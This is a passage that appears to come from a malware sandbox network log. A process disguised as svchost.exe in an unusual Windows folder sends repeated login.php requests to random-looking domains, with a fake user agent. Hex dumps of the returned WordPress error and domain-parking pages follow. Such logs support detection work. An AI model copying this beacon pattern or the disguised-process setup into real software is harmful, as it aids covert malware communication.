2024-11-11 17:13:03 UTC	422	IN	Data Raw: 37 63 61 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e Data Ascii: 7caa<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
2024-11-11 17:13:03 UTC	1369	IN	Data Raw: 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 31 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 Data Ascii: e><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v21.3 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found -</title><meta property="og:locale" content="en_US" /><meta proper
2024-11-11 17:13:03 UTC	1369	IN	Data Raw: 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 7d 3b 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 Data Ascii: c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.wi
2024-11-11 17:13:03 UTC	1369	IN	Data Raw: 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f 3d 22 77 70 45 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e 70 61 72 73 Data Ascii: =typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.pars
2024-11-11 17:13:03 UTC	1369	IN	Data Raw: 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66 69 65 64 2f 6d 61 69 Data Ascii: atemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script><link rel='stylesheet' id='astra-theme-css-css' href='https://qegyhig.com/wp-content/themes/astra/assets/css/minified/mai
2024-11-11 17:13:03 UTC	1369	IN	Data Raw: 65 73 63 72 69 70 74 69 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 39 33 37 35 72 65 6d 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7d 2e 65 6e 74 72 79 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 7d 68 31 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 Data Ascii: escription{font-size:15px;font-size:0.9375rem;display:none;}.entry-title{font-size:26px;font-size:1.625rem;}h1,.entry-content h1{font-size:40px;font-size:2.5rem;font-weight:600;line-height:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;font-wei
2024-11-11 17:13:03 UTC	1369	IN	Data Raw: 62 6b 69 74 2d 73 6c 69 64 65 72 2d 74 68 75 6d 62 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 7d 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 68 6f 76 65 72 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 2c 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 66 6f 63 75 73 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 64 31 30 34 30 34 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 6e 65 78 74 7b 63 Data Ascii: bkit-slider-thumb{border-color:#d10404;background-color:#d10404;box-shadow:none;}.site-footer a:hover + .post-count,.site-footer a:focus + .post-count{background:#d10404;border-color:#d10404;}.single .nav-links .nav-previous,.single .nav-links .nav-next{c
2024-11-11 17:13:03 UTC	1369	IN	Data Raw: 20 2e 75 61 67 62 2d 69 66 62 2d 63 74 61 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 75 61 67 62 2d 62 75 74 74 6f 6e 73 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 62 62 2d 6d 6f 64 75 6c 65 2d 63 6f 6e 74 65 6e 74 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 70 6f 73 74 2d 67 72 69 64 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e Data Ascii: .uagb-ifb-cta a,.ast-single-post .entry-content .wp-block-uagb-buttons a,.ast-single-post .entry-content .uabb-module-content a,.ast-single-post .entry-content .uagb-post-grid a,.ast-single-post .entry-content .uagb-timeline a,.ast-single-post .entry-con

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	58866	99.83.170.3	443	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 17:13:02 UTC	267	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com Connection: Keep-Alive
2024-11-11 17:13:02 UTC	352	IN	HTTP/1.1 200 OK Alt-Svc: h3=":443"; ma=2592000 Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate Content-Type: text/html; charset=utf-8 Date: Mon, 11 Nov 2024 17:13:02 GMT Etag: "eo8hdgdsrl19wv" Server: Caddy Server: awselb/2.0 Vary: Accept-Encoding X-Powered-By: Next.js Connection: close Transfer-Encoding: chunked
2024-11-11 17:13:02 UTC	2372	IN	Data Raw: 38 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 53 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 70 75 62 6c 69 63 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 Data Ascii: 8000<!DOCTYPE html><html lang="en-US"><head><meta charSet="utf-8"/><link rel="apple-touch-icon" sizes="180x180" href="https://d15wejze7d2tlj.cloudfront.net/v1/public/apple-touch-icon.png"/><link rel="icon" type="image/png" sizes="32x32" href="https://d1
2024-11-11 17:13:02 UTC	1724	IN	Data Raw: 65 78 74 2f 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 62 31 35 35 61 35 35 36 2d 37 32 37 37 64 32 30 35 62 33 61 39 36 64 64 31 2e 6a 73 22 20 64 65 66 65 72 3d 22 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 62 37 37 39 62 62 35 65 2d 65 33 34 61 63 36 66 32 62 33 32 65 65 39 62 31 2e 6a 73 22 20 64 65 66 65 72 3d 22 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f Data Ascii: ext/static/chunks/b155a556-7277d205b3a96dd1.js" defer=""></script><script src="https://d15wejze7d2tlj.cloudfront.net/v1/_next/static/chunks/b779bb5e-e34ac6f2b32ee9b1.js" defer=""></script><script src="https://d15wejze7d2tlj.cloudfront.net/v1/_next/static/
2024-11-11 17:13:02 UTC	4744	IN	Data Raw: 78 2d 63 6f 6c 20 67 61 70 2d 32 20 6d 62 2d 36 22 3e 3c 68 32 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 49 6e 74 65 72 20 74 65 78 74 2d 78 6c 20 66 6f 6e 74 2d 62 6f 6c 64 20 73 6d 3a 74 65 78 74 2d 32 78 6c 22 3e 49 6e 71 75 69 72 65 20 74 6f 64 61 79 20 74 6f 20 73 65 63 75 72 65 20 74 68 69 73 20 64 6f 6d 61 69 6e 3c 2f 68 32 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 49 6e 74 65 72 20 74 65 78 74 2d 73 6d 20 66 6f 6e 74 2d 6e 6f 72 6d 61 6c 20 73 6d 3a 74 65 78 74 2d 62 61 73 65 22 3e 50 6c 65 61 73 65 20 63 6f 6d 70 6c 65 74 65 20 74 68 65 20 66 6f 72 6d 20 62 65 6c 6f 77 20 61 6e 64 20 77 65 20 77 69 6c 6c 20 63 6f 6e 6e 65 63 74 20 79 6f 75 20 77 69 74 68 20 6f 6e 65 20 6f 66 20 6f 75 72 20 64 6f 6d 61 69 6e 20 65 78 70 65 72 74 73 2e Data Ascii: x-col gap-2 mb-6"><h2 class="font-Inter text-xl font-bold sm:text-2xl">Inquire today to secure this domain</h2><span class="font-Inter text-sm font-normal sm:text-base">Please complete the form below and we will connect you with one of our domain experts.
2024-11-11 17:13:02 UTC	5930	IN	Data Raw: 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 44 45 22 3e 44 45 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 34 39 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 50 45 22 3e 50 45 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 31 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 4d 58 22 3e 4d 58 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 32 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 43 55 22 3e 43 55 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 33 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e Data Ascii: -- -->)</option><option value="DE">DE... --> (+... -->49... -->)</option><option value="PE">PE... --> (+... -->51... -->)</option><option value="MX">MX... --> (+... -->52... -->)</option><option value="CU">CU... --> (+... -->53... -->)</option
2024-11-11 17:13:02 UTC	7116	IN	Data Raw: 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 36 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 43 59 22 3e 43 59 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 37 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 41 58 22 3e 41 58 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 38 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 46 49 22 3e 46 49 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 38 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 42 47 22 3e 42 47 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 Data Ascii: --> (+... -->356... -->)</option><option value="CY">CY... --> (+... -->357... -->)</option><option value="AX">AX... --> (+... -->358... -->)</option><option value="FI">FI... --> (+... -->358... -->)</option><option value="BG">BG... --> (+...
2024-11-11 17:13:02 UTC	8302	IN	Data Raw: 69 63 65 2d 72 65 71 75 65 73 74 2d 66 6f 72 6d 2d 69 64 22 20 74 69 74 6c 65 3d 22 47 65 74 20 70 72 69 63 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 47 65 74 20 70 72 69 63 65 22 20 6c 61 62 65 6c 3d 22 47 65 74 20 70 72 69 63 65 22 20 65 6e 64 49 63 6f 6e 3d 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 63 65 6e 74 65 72 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 31 2e 35 20 6d 78 2d 61 75 74 6f 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 32 22 3e 47 65 74 20 70 72 69 63 65 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 Data Ascii: ice-request-form-id" title="Get price" aria-label="Get price" label="Get price" endIcon="[object Object]"><span class="flex justify-center items-center gap-1.5 mx-auto"><div class="flex items-center gap-2">Get price<svg xmlns="http://www.w3.org/2000/svg"
2024-11-11 17:13:02 UTC	2586	IN	Data Raw: 30 2e 33 76 2e 30 36 37 68 2d 2e 31 33 36 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 37 56 2e 37 36 48 39 2e 39 36 76 2e 30 36 38 68 2d 2e 31 33 36 76 2e 30 36 37 68 2d 2e 30 36 38 76 2e 30 36 38 48 39 2e 36 39 76 2e 30 36 38 48 39 2e 36 32 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 31 33 35 76 2e 30 36 37 48 39 2e 33 35 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 37 48 39 2e 30 38 76 2e 30 36 38 48 39 2e 30 31 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 37 76 2e 30 36 37 48 38 2e 37 34 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 37 48 38 Data Ascii: 0.3v.067h-.136v.068h-.068v.068h-.067V.76H9.96v.068h-.136v.067h-.068v.068H9.69v.068H9.62v.068h-.068v.068h-.135v.067H9.35v.068h-.068v.068h-.068v.068h-.068v.067H9.08v.068H9.01v.068h-.068v.068h-.068v.068h-.067v.067H8.74v.068h-.068v.068h-.068v.068h-.068v.067H8
2024-11-11 17:13:02 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-11-11 17:13:02 UTC	4096	IN	Data Raw: 36 38 38 31 0d 0a 65 6e 74 43 6f 6c 6f 72 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 39 2e 36 37 20 34 2e 34 37 34 68 2d 33 2e 39 34 36 76 31 31 2e 32 38 37 68 33 2e 39 34 35 63 33 2e 36 30 36 20 30 20 35 2e 39 35 2d 32 2e 32 31 35 20 35 2e 39 35 2d 35 2e 36 32 37 20 30 2d 33 2e 34 32 39 2d 32 2e 33 34 34 2d 35 2e 36 36 2d 35 2e 39 35 2d 35 2e 36 36 6d 2d 31 2e 36 38 33 20 39 2e 33 36 32 56 36 2e 33 38 32 68 31 2e 36 30 31 63 32 2e 33 37 38 20 30 20 33 2e 37 32 20 31 2e 34 30 37 20 33 2e 37 32 20 33 2e 37 35 32 73 2d 31 2e 33 34 32 20 33 2e 37 30 32 2d 33 2e 37 32 20 33 2e 37 30 32 7a 6d 31 37 2e 39 38 32 2d 32 2e 35 35 34 63 30 2d 32 2e 38 33 2d 32 2e 30 32 32 2d 34 2e 36 32 35 2d 34 2e 36 30 39 2d 34 2e 36 32 35 73 Data Ascii: 6881entColor" fill-rule="evenodd" d="M29.67 4.474h-3.946v11.287h3.945c3.606 0 5.95-2.215 5.95-5.627 0-3.429-2.344-5.66-5.95-5.66m-1.683 9.362V6.382h1.601c2.378 0 3.72 1.407 3.72 3.752s-1.342 3.702-3.72 3.702zm17.982-2.554c0-2.83-2.022-4.625-4.609-4.625s
2024-11-11 17:13:02 UTC	13046	IN	Data Raw: 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 31 33 35 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 30 36 37 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 37 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 31 33 35 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 31 33 35 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 37 76 2d 2e 31 33 36 68 2d 2e 30 36 38 76 2d 2e 30 36 37 68 2d 2e 30 36 38 76 2d 2e 31 33 36 68 2d 2e 30 36 38 76 2d 2e 31 33 36 Data Ascii: 068h-.068v-.068h-.135v-.068h-.136v-.068h-.136v-.067h-.067v-.068h-.068v-.068h-.068v-.068h-.068v-.067h-.067v-.068h-.068v-.068h-.068v-.068h-.136v-.135h-.067v-.068h-.068v-.068h-.068v-.135h-.068v-.068h-.068v-.068h-.067v-.136h-.068v-.067h-.068v-.136h-.068v-.136

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	58868	188.114.96.3	443	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 17:13:03 UTC	267	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Connection: Keep-Alive
2024-11-11 17:13:04 UTC	953	IN	HTTP/1.1 404 Not Found Date: Mon, 11 Nov 2024 17:13:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/" cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BI6BsDE4j6UOAr484GISj1CgSyucJ%2FFwlk%2BQ9KGIBH93dgwZb5U2Ry3qQwciQvPFZAzPlK%2BVCFMP0H%2BwlYWq0cLRqZI9GxRDQClQkf5QYZenGIH33h5M1Be4MxC%2BXw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e0fe927b92f5590-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1138&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=2195602&cwnd=250&unsent_bytes=0&cid=b9e9f4a62d052aba&ts=876&x=0"
2024-11-11 17:13:04 UTC	416	IN	Data Raw: 37 63 61 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 